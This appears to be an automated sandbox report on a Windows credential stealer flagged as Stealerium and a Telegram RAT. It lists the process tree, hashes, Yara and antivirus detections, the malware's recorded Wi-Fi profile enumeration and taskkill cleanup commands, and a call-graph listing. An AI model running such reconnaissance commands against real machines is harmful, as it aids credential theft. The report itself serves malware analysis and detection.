                                                                                                                                                                                                                                                          Statistics

                                                                                                                                                                                                                                                          CPU Usage

                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                          Memory Usage

                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                                                                                          Behavior

                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                          System Behavior

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                                                                          Start time:04:57:05
                                                                                                                                                                                                                                                          Start date:29/11/2024
                                                                                                                                                                                                                                                          Path:C:\Users\user\Desktop\LKxcbzlwkz.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\LKxcbzlwkz.exe"
                                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                                          File size:5'015'009 bytes
                                                                                                                                                                                                                                                          MD5 hash:8959A4884F81AC4DB0967B534DAE9617
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Stealerium, Description: Yara detected Stealerium, Source: 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:1
                                                                                                                                                                                                                                                          Start time:04:57:06
                                                                                                                                                                                                                                                          Start date:29/11/2024
                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\JOUNLV.exe"
                                                                                                                                                                                                                                                          Imagebase:0x1bb35cc0000
                                                                                                                                                                                                                                                          File size:3'747'840 bytes
                                                                                                                                                                                                                                                          MD5 hash:8F39B25AF1B9048E0C7B06256C602B4F
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Stealerium, Description: Yara detected Stealerium, Source: 00000001.00000002.2015535093.000001BB384E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Stealerium, Description: Yara detected Stealerium, Source: 00000001.00000002.2015535093.000001BB37EFD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2015535093.000001BB37EFD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.2015535093.000001BB37EFD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000001.00000002.2015535093.000001BB37EFD000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000002.2015535093.000001BB37E21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Stealerium, Description: Yara detected Stealerium, Source: 00000001.00000002.2015535093.000001BB38567000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Stealerium, Description: Yara detected Stealerium, Source: 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Stealerium, Description: Yara detected Stealerium, Source: 00000001.00000000.1763580624.000001BB35CC2000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000000.1763580624.000001BB35CC2000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.1763580624.000001BB35CC2000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000001.00000000.1763580624.000001BB35CC2000.00000002.00000001.01000000.00000006.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Stealerium, Description: Yara detected Stealerium, Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: C:\Users\user\AppData\Local\Temp\JOUNLV.exe, Author: ditekSHen
                                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                          • Detection: 66%, ReversingLabs
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:2
                                                                                                                                                                                                                                                          Start time:04:57:06
                                                                                                                                                                                                                                                          Start date:29/11/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\AEAWHK.bat" "
                                                                                                                                                                                                                                                          Imagebase:0x240000
                                                                                                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:3
                                                                                                                                                                                                                                                          Start time:04:57:06
                                                                                                                                                                                                                                                          Start date:29/11/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:4
                                                                                                                                                                                                                                                          Start time:04:57:06
                                                                                                                                                                                                                                                          Start date:29/11/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\openfiles.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:OPENFILES
                                                                                                                                                                                                                                                          Imagebase:0x7f0000
                                                                                                                                                                                                                                                          File size:60'416 bytes
                                                                                                                                                                                                                                                          MD5 hash:50BD10A4C573E609A401114488299D3D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:5
                                                                                                                                                                                                                                                          Start time:04:57:14
                                                                                                                                                                                                                                                          Start date:29/11/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                                                                                                                                                                                                                                                          Imagebase:0x7ff7de3a0000
                                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:6
                                                                                                                                                                                                                                                          Start time:04:57:14
                                                                                                                                                                                                                                                          Start date:29/11/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:7
                                                                                                                                                                                                                                                          Start time:04:57:14
                                                                                                                                                                                                                                                          Start date:29/11/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\chcp.com
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:chcp 65001
                                                                                                                                                                                                                                                          Imagebase:0x7ff617a80000
                                                                                                                                                                                                                                                          File size:14'848 bytes
                                                                                                                                                                                                                                                          MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:8
                                                                                                                                                                                                                                                          Start time:04:57:14
                                                                                                                                                                                                                                                          Start date:29/11/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                          Imagebase:0x7ff7b3ed0000
                                                                                                                                                                                                                                                          File size:69'632 bytes
                                                                                                                                                                                                                                                          MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:9
                                                                                                                                                                                                                                                          Start time:04:57:14
                                                                                                                                                                                                                                                          Start date:29/11/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:netsh wlan show profile
                                                                                                                                                                                                                                                          Imagebase:0x7ff783dc0000
                                                                                                                                                                                                                                                          File size:96'768 bytes
                                                                                                                                                                                                                                                          MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:10
                                                                                                                                                                                                                                                          Start time:04:57:14
                                                                                                                                                                                                                                                          Start date:29/11/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:findstr All
                                                                                                                                                                                                                                                          Imagebase:0x7ff645d30000
                                                                                                                                                                                                                                                          File size:36'352 bytes
                                                                                                                                                                                                                                                          MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:11
                                                                                                                                                                                                                                                          Start time:04:57:15
                                                                                                                                                                                                                                                          Start date:29/11/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                                                                                                                                                                                                                                                          Imagebase:0x7ff7de3a0000
                                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:12
                                                                                                                                                                                                                                                          Start time:04:57:15
                                                                                                                                                                                                                                                          Start date:29/11/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:13
                                                                                                                                                                                                                                                          Start time:04:57:15
                                                                                                                                                                                                                                                          Start date:29/11/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\chcp.com
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:chcp 65001
                                                                                                                                                                                                                                                          Imagebase:0x7ff617a80000
                                                                                                                                                                                                                                                          File size:14'848 bytes
                                                                                                                                                                                                                                                          MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:14
                                                                                                                                                                                                                                                          Start time:04:57:15
                                                                                                                                                                                                                                                          Start date:29/11/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:netsh wlan show networks mode=bssid
                                                                                                                                                                                                                                                          Imagebase:0x7ff783dc0000
                                                                                                                                                                                                                                                          File size:96'768 bytes
                                                                                                                                                                                                                                                          MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:18
                                                                                                                                                                                                                                                          Start time:04:57:31
                                                                                                                                                                                                                                                          Start date:29/11/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\deec1b5f-97cf-494d-80f2-5e4fb7cf93cd.bat"
                                                                                                                                                                                                                                                          Imagebase:0x7ff7de3a0000
                                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:19
                                                                                                                                                                                                                                                          Start time:04:57:31
                                                                                                                                                                                                                                                          Start date:29/11/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:20
                                                                                                                                                                                                                                                          Start time:04:57:31
                                                                                                                                                                                                                                                          Start date:29/11/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\chcp.com
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:chcp 65001
                                                                                                                                                                                                                                                          Imagebase:0x7ff617a80000
                                                                                                                                                                                                                                                          File size:14'848 bytes
                                                                                                                                                                                                                                                          MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:21
                                                                                                                                                                                                                                                          Start time:04:57:31
                                                                                                                                                                                                                                                          Start date:29/11/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:taskkill /F /PID 4828
                                                                                                                                                                                                                                                          Imagebase:0x7ff6084c0000
                                                                                                                                                                                                                                                          File size:101'376 bytes
                                                                                                                                                                                                                                                          MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:22
                                                                                                                                                                                                                                                          Start time:04:57:31
                                                                                                                                                                                                                                                          Start date:29/11/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\timeout.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:timeout /T 2 /NOBREAK
                                                                                                                                                                                                                                                          Imagebase:0x7ff79b1c0000
                                                                                                                                                                                                                                                          File size:32'768 bytes
                                                                                                                                                                                                                                                          MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Disassembly

                                                                                                                                                                                                                                                          Reset < >

                                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                                            Execution Coverage:4.2%
                                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                            Signature Coverage:13.1%
                                                                                                                                                                                                                                                            Total number of Nodes:2000
                                                                                                                                                                                                                                                            Total number of Limit Nodes:131
                                                                                                                                                                                                                                                            execution_graph 83411 4010e0 83414 401100 83411->83414 83413 4010f8 83415 401113 83414->83415 83416 401120 83415->83416 83417 401184 83415->83417 83418 40114c 83415->83418 83445 401182 83415->83445 83419 40112c DefWindowProcW 83416->83419 83473 401000 Shell_NotifyIconW setSBCS 83416->83473 83452 401250 83417->83452 83421 401151 83418->83421 83422 40119d 83418->83422 83419->83413 83425 401219 83421->83425 83426 40115d 83421->83426 83423 4011a3 83422->83423 83424 42afb4 83422->83424 83423->83416 83430 4011b6 KillTimer 83423->83430 83431 4011db SetTimer RegisterWindowMessageW 83423->83431 83468 40f190 10 API calls 83424->83468 83425->83416 83435 401225 83425->83435 83427 401163 83426->83427 83432 42b01d 83426->83432 83433 42afe9 83427->83433 83434 40116c 83427->83434 83467 401000 Shell_NotifyIconW setSBCS 83430->83467 83436 401193 83431->83436 83442 401204 CreatePopupMenu 83431->83442 83432->83419 83472 4370f4 52 API calls 83432->83472 83470 40f190 10 API calls 83433->83470 83434->83416 83444 401174 83434->83444 83475 468b0e 74 API calls setSBCS 83435->83475 83436->83413 83437 42b04f 83474 40e0c0 74 API calls setSBCS 83437->83474 83442->83413 83469 45fd57 65 API calls setSBCS 83444->83469 83445->83419 83446 42afe4 83446->83436 83447 42b00e 83471 401a50 465 API calls 83447->83471 83448 4011c9 PostQuitMessage 83448->83413 83451 42afdc 83451->83419 83451->83446 83453 401262 setSBCS 83452->83453 83454 4012e8 83452->83454 83476 401b80 83453->83476 83454->83436 83456 4012d1 KillTimer SetTimer 83456->83454 83457 40128c 83457->83456 83458 4012bb 83457->83458 83459 4272ec 83457->83459 83460 4012c5 83458->83460 83461 42733f 83458->83461 83462 4272f4 Shell_NotifyIconW 83459->83462 83463 42731a Shell_NotifyIconW 83459->83463 83460->83456 83464 427393 Shell_NotifyIconW 83460->83464 83465 427348 Shell_NotifyIconW 83461->83465 83466 42736e Shell_NotifyIconW 83461->83466 83462->83456 83463->83456 83464->83456 83465->83456 83466->83456 83467->83448 83468->83436 83469->83451 83470->83447 83471->83445 83472->83445 83473->83437 83474->83445 83475->83446 83477 401b9c 83476->83477 83497 401c7e 83476->83497 83498 4013c0 52 API calls 83477->83498 83479 401bac 83480 42722b LoadStringW 83479->83480 83481 401bb9 83479->83481 83483 427246 83480->83483 83499 402160 83481->83499 83513 40e0a0 83483->83513 83484 401bcd 83486 427258 83484->83486 83487 401bda 83484->83487 83517 40d200 52 API calls 2 library calls 83486->83517 83487->83483 83488 401be4 83487->83488 83512 40d200 52 API calls 2 library calls 83488->83512 83491 427267 83492 42727b 83491->83492 83494 401bf3 setSBCS _wcscpy _wcsncpy 83491->83494 83518 40d200 52 API calls 2 library calls 83492->83518 83496 401c62 Shell_NotifyIconW 83494->83496 83495 427289 83496->83497 83497->83457 83498->83479 83500 426daa 83499->83500 83501 40216b _wcslen 83499->83501 83532 40c600 83500->83532 83504 402180 83501->83504 83505 40219e 83501->83505 83503 426db5 83503->83484 83519 403bd0 52 API calls ctype 83504->83519 83520 4013a0 52 API calls 83505->83520 83508 402187 _memmove 83508->83484 83509 4021a5 83510 426db7 83509->83510 83521 4115d7 83509->83521 83512->83494 83514 40e0b2 83513->83514 83515 40e0a8 83513->83515 83514->83494 83568 403c30 52 API calls _memmove 83515->83568 83517->83491 83518->83495 83519->83508 83520->83509 83523 4115e1 _malloc 83521->83523 83524 4115fb 83523->83524 83526 4115fd std::exception::exception 83523->83526 83537 4135bb 83523->83537 83524->83508 83530 41163b 83526->83530 83551 41130a 51 API calls __cinit 83526->83551 83527 411645 83553 418105 RaiseException 83527->83553 83552 4180af 46 API calls std::exception::operator= 83530->83552 83531 411656 83533 40c619 83532->83533 83534 40c60a 83532->83534 83533->83503 83534->83533 83560 4026f0 83534->83560 83536 426d7a _memmove 83536->83503 83538 413638 _malloc 83537->83538 83541 4135c9 _malloc 83537->83541 83559 417f77 46 API calls __getptd_noexit 83538->83559 83539 4135d4 83539->83541 83554 418901 46 API calls __NMSG_WRITE 83539->83554 83555 418752 46 API calls 8 library calls 83539->83555 83556 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 83539->83556 83541->83539 83543 4135f7 RtlAllocateHeap 83541->83543 83546 413624 83541->83546 83549 413622 83541->83549 83543->83541 83544 413630 83543->83544 83544->83523 83557 417f77 46 API calls __getptd_noexit 83546->83557 83558 417f77 46 API calls __getptd_noexit 83549->83558 83551->83530 83552->83527 83553->83531 83554->83539 83555->83539 83557->83549 83558->83544 83559->83544 83561 426873 83560->83561 83562 4026ff 83560->83562 83567 4013a0 52 API calls 83561->83567 83562->83536 83564 42687b 83565 4115d7 52 API calls 83564->83565 83566 42689e _memmove 83565->83566 83566->83536 83567->83564 83568->83514 83569 42d142 83573 480a8d 83569->83573 83571 42d14f 83572 480a8d 465 API calls 83571->83572 83572->83571 83574 480ae4 83573->83574 83575 480b26 83573->83575 83577 480aeb 83574->83577 83578 480b15 83574->83578 83604 40bc70 83575->83604 83580 480aee 83577->83580 83581 480b04 83577->83581 83611 4805bf 465 API calls 83578->83611 83580->83575 83582 480af3 83580->83582 83610 47fea2 465 API calls __itow_s 83581->83610 83609 47f135 465 API calls 83582->83609 83584 40e0a0 52 API calls 83598 480b2e 83584->83598 83588 480aff 83638 408f40 83588->83638 83589 481156 83590 408f40 VariantClear 83589->83590 83591 48115e 83590->83591 83591->83571 83592 40e710 53 API calls 83592->83598 83595 40c2c0 52 API calls 83595->83598 83596 408e80 VariantClear 83596->83598 83597 40a780 465 API calls 83597->83598 83598->83584 83598->83588 83598->83592 83598->83595 83598->83596 83598->83597 83599 480ff5 83598->83599 83612 401980 83598->83612 83620 45377f 52 API calls 83598->83620 83621 45e951 53 API calls 83598->83621 83622 40e830 83598->83622 83635 47925f 53 API calls 83598->83635 83636 47fcff 465 API calls 83598->83636 83637 45e737 90 API calls 3 library calls 83599->83637 83605 4115d7 52 API calls 83604->83605 83606 40bc98 83605->83606 83607 4115d7 52 API calls 83606->83607 83608 40bca6 83607->83608 83608->83598 83609->83588 83610->83588 83611->83588 83613 4019a3 83612->83613 83614 401985 83612->83614 83613->83614 83615 4019b8 83613->83615 83617 40199f 83614->83617 83642 403e10 53 API calls 83614->83642 83643 403e10 53 API calls 83615->83643 83617->83598 83619 4019c4 83619->83598 83620->83598 83621->83598 83623 427c86 83622->83623 83624 40e84a 83622->83624 83645 40e1f0 VariantClear ctype 83623->83645 83644 40e950 53 API calls 83624->83644 83627 427c8b 83646 40e950 53 API calls 83627->83646 83628 40e84f 83628->83627 83631 40e85c 83628->83631 83630 4115d7 52 API calls 83632 40e8fc 83630->83632 83631->83630 83634 40e907 83631->83634 83633 4115d7 52 API calls 83632->83633 83633->83634 83634->83598 